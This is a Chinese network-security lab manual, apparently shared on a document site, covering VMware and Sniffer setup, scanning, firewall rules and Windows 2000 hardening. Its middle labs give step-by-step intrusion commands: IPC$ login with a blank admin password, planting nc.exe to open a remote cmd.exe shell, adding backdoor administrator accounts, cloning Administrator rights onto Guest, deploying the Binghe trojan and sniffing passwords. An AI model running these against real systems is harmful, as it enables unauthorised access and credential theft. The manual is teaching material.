网络安全实验指导Word文件下载.docx
- 文档编号:7192085
- 上传时间:2023-05-08
- 格式:DOCX
- 页数:11
- 大小:19.98KB
网络安全实验指导Word文件下载.docx
《网络安全实验指导Word文件下载.docx》由会员分享,可在线阅读,更多相关《网络安全实验指导Word文件下载.docx(11页珍藏版)》请在冰点文库上搜索。
点击按钮“下一步”。
3)进入选择操作系统界面,设置将来要安装的操作系统windows2000advancedsever.点击按钮“下一步”.
4)选择虚拟机的内存大小,我们设置128M.点击下一步。
5)选择虚拟机的连网方式,我们设置为“UsedBridgednetworking”,点击“下一步”。
6)创建磁盘,我们选择Createanewvirtualdisk,点击下一步。
7)选择虚拟磁盘所要安装的目录,最后完成。
3、测试vmware虚拟机和局域网中其他电脑的连通性。
1)设置虚拟机的ip(和主机ip在同一网段)。
2)用ping命令测试虚拟机在局域网的连通性。
4、使用sniffer抓包
1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。
选择主菜单Capture下的DefineFilter菜单
2)在Address下拉列表中,选择抓包的类型是IP。
3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP和ICMP选中。
4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode选项卡,可以看到数据包在两台计算机间的传递过程。
五实验小结
通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。
六注意事项
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
项目二网络基本命令的使用
一实验目的
1、理解并熟练掌握网络攻击和防御中常见的DOS命令。
2、掌握IPC$技术的攻击及防御的常用方法。
二实验设备
1、连接到局域网的计算机多台。
2、使用软件:
shutdown.exe(远程关机程序);
nc.exe(“瑞士军刀”程序)。
三实验学时
四实验内容
1、利用DOS命令实现远程关机:
1)拷贝工具shutdown.exe到本机目录c:
\winnt\system32下。
2)输入命令:
ping目标机ip,测试和目标机的是否连通。
3)用net命令进行远程连接:
netuse\\目标机ip\ipc$“password”/user:
”username”(局域网内计算机用户id为:
administrator,用户password为空).
4)输入远程重启计算机指令:
shutdown-r-m\\目标机ip(命令:
shutdown/?
查询shutdown的使用方法)
2、利用nc.exe在远程电脑开启telnet服务:
1)利用net命令同远程电脑建立连接,方法同上。
2)使用copy命令将nc.exe拷贝到远程电脑的C:
\winnt\system32目录下:
●netuse\\目标机ip\ipc$“password”/user:
”username”
●copy\本机路径\nc.exe\\目标机ip\admin$\system32
3)利用at命令远程执行程序nc.exe开启telnet服务。
at\\目标机IPtimenc-l-p99(指定端口)-t-ecmd.exe(命令:
nc–h查询nc程序的使用方法)
4)利用目标机99端口telnet登陆远程电脑:
telnet目标机ip99
3、在远程电脑上新建文件。
4、在远程计算机上创建自己的管理员用户:
1)netuserusername/add
2)netlocalgroupadministratorsusername/add
5、查看当前系统中的用户确认添加用户操作是否成功:
netuser
6、删除本机ipc$共享:
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete…
7、查看端口操作:
使用命令netstat–an查看本机端口。
五实验小结
通过本次实验同学们熟练掌握一些常用的网络命令,进一步理解了ipc$技术的漏洞和防御方法。
实验的软件要求计算机重新启动,计算机有保护卡将不能正常安装。
一、实验目的
掌握网络监听的工作机制和作用,学习常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用。
二、实验设备
1、连接到局域网的计算机多台
2、扫描和监听程序,如PortScan、WinSniffer和X-scan等。
三、实验学时
四、实验内容
实验需要两台计算机,可在主机的vmware中安装Windows2000Server来代替另一台计算机,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。
1、在主机的vmware中安装Windows2000Server,并开放远程终端服务端口,在主机中安装扫描和监听程序,如PortScan、WinSniffer和X-scan等。
2、使用扫描和网络监听程序对安装Windows2000Server的服务器进行监听并实现入侵。
1)使用PortScan对Windows2000Server的服务器进行端口扫描,在“Scan”文本框中输入IP地址,单击按钮“START”,开始扫描。
2)使用X-scan对Windows2000Server的服务器进行网络安全漏洞扫描。
在“指定IP范围”中输入对方IP,并在“扫描模块”设置想要扫描的参数,设置完成后,点击“开始扫描”。
3)使用网络监听WinSniffer截取局域网内的密码。
安装并打开WinSniffer,单击工具栏图标“Adapter”,设置网卡为本机物理网卡“RealtekRTL8139(A)”,单击“start”开始监听。
使用DOS命令行连接远程的FTP服务,抓取密码。
五、实验总结
本次实验使学生掌握常用的扫描和监听工具,如PortScan、WinSniffer和X-scan等程序的使用方法。
区分木马和后门,掌握常用的后门设置方法,掌握木马冰河的使用、掌握如何设置网络代理跳板。
2、使用工具:
RTCS.vbe、psu.exe、pulist.exe、djxyxs.exe、冰河V8.2、sksockserver.exe、SkServerGUI.exe、sc32r231.exe
1、利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。
命令的语法是:
“cscriptRTCS.vbe172.18.25.109administrator123456123”。
2、利用工具软件psu.exe得到注册表键值的查看和编辑权。
将psu.exe拷贝对方主机的C盘下,并在任务管理器查看对方主机winlogon.exe进程的ID号或者使用pulist.exe文件查看该进程的ID号,执行命令:
“psu-pregedit-ipid”其中pid为Winlogon.exe的进程号。
在打开的注册表编辑器中将Guest(0x1f5)中的键值用Administrator(0x1f4)中的键值覆盖。
在注册表中将Guest和0x1f5导出,删除,再重新导入。
然后执行:
“netuserguest(新密码)--修改guest帐户密码
netuserguest/active:
yes--开启guest帐户
no--停止guest帐户
”OK!
3、将djxyxs.exe文件上传并拷贝到对方服务器的Winnt\temp目录下,执行,解压后执行解压出来的azzd.exe文件。
该文件使服务器自动重启,使用终端服务连接软件(如mstsc.exe)登陆服务器。
4、使用“冰河”进行远程控制
win32.exe文件是服务器端程序,Y_Client.exe文件为客户端程序。
将win32.exe文件在远程得计算机上执行以后,通过Y_Client.exe文件来控制远程得服务器。
5、首先将本地计算机设置为一级代理,将文件拷贝到C盘根目录下,然后将代理服务工具sksockserver.exe安装到主机上。
执行步骤为:
执行“sksockserver-install”将代理服务安装主机中,执行“sksockserver-configport1122”将代理服务的端口设置为1122,当然可以设置为其他的数值,执行“sksockserver-configstarttype2”将该服务的启动方式设置为自动启动,执行“netstartskserver”启动代理服务。
在网络上其他的主机上设置二级代理,使用本地代理配置工具:
SkServerGUI.exe,在主菜单“配置”下的菜单项“经过的SKServer”设置参数。
安装sc32r231.exe,安装汉化HBC-SC32231-Ronnier.exe,然后执行该程序。
五实验总结
通过本次实验使学生能够区分木马和后门,掌握远程开启对方的Telnet服、让禁用的Guest具有管理权限的方法、连接到终端服务的方法,并考虑其防御方法,掌握如何设置网络代理跳板。
实验软件有一定的破坏性,有可能影响实验用计算机的正常运行。
1、掌握操作系统安全配置。
2、掌握操作系统的安全策略配置。
3、掌握操作系统安全信息通信配置。
1、Windows2000操作系统。
2、局域网环境。
4学时
1、操作系统安全配置:
停止Guest帐号、限制用户数量、创建多个管理员帐号、管理员帐号改名、设置陷阱帐号、更改默认权限、管理员帐号设置安全密码、设置屏幕保护密码。
2、操作系统的安全策略配置:
关闭不必要的服务、关闭不必要的端口、开启审核策略、开启密码策略、开启帐户策略、备份敏感文件、不显示上次登陆名、禁止建立空连接、下载最新的补丁。
3、操作系统安全信息通信配置:
关闭DirectDraw、关闭默认共享、禁用DumpFile、熟悉文件加密系统、加密Temp文件夹、锁住注册表、关机时清除文件、禁止软盘光盘启动、禁止判断主机类型、抵抗DDOS、禁止Guest访问日志、使用数据恢复软件恢复已丢失的数据。
通过本次实验,能够基本掌握操作系统的初级、中级和高级配置。
1、用WinRoute创建包过滤规则
2、用WinRoute禁用FTP访问
3、用WinRoute禁用HTTP访问
4、掌握入侵检测工具:
BlackICE、冰之眼
1、Windows操作系统。
2、WinRoute、BlackICE、冰之眼。
1、安装WinRoute
以管理员身份安装该软件,安装完毕后,启动“WinRouteAdministration”。
默认情况下,该密码为空。
点击按钮“OK”,进入系统管理。
当系统安装完毕以后,该主机就将不能上网,需要修改默认设置,点击工具栏图标,出现本地网络设置对话框,然后查看“Ethernet”的属性,将两个复选框全部选中。
2、用WinRoute创建包过滤规则
1)选择菜单项“PacketFilter”,选中网卡图标,单击按钮“添加”。
出现过滤规则添加对话框,所有的过滤规则都在此处添加。
2)在协议下拉列表中选择“ICMP”,在“ICMPType”栏目中,将复选框全部选中。
在“Action”栏目中,选择单选框“Drop”。
在“LogPacket”栏目中选中“LogintoWindow”,创建完毕后点击按钮“OK”,一条规则就创建完毕。
3)为了使设置的规则生效,点击按钮“使用”。
4)设置完毕,使用指令“Ping”来探测主机,将收不到回应,虽然主机没有响应,但是已经将事件记录到安全日志了。
选择菜单栏“View”下的菜单项“Logs>
SecurityLogs”,察看日志纪录。
3、用WinRoute禁用FTP访问
FTP服务用TCP协议,FTP占用TCP的21端口,主机的IP地址是“目的IP”,首先利用WinRoute建立访问规则如表:
组序号
动作
源IP
目的IP
源端口
目的端口
协议类型
1
禁止
*
“目的IP”
21
TCP
设置访问规则以后,再访问主机“172.18.25.109”的FTP服务,将遭到拒绝
访问违反了访问规则,会在主机的安全日志中记录下来。
4、用WinRoute禁用HTTP访问
HTTP服务用TCP协议,占用TCP协议的80端口,主机的IP地址是“目的IP”,首先利用WinRoute建立访问规则如表:
80
打开本地的IE连接远程主机的HTTP服务,将遭到拒绝,访问违反了访问规则,所以在主机的安全日志中记录下来。
5、入侵检测工具:
BlackICE。
6、入侵检测工具:
冰之眼
学会使用WinRoute创建包过滤规则、禁用FTP访问、HTTP访问,掌握入侵检测工具:
BlackICE、冰之眼。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络安全 实验 指导
![提示](https://static.bingdoc.com/images/bang_tan.gif)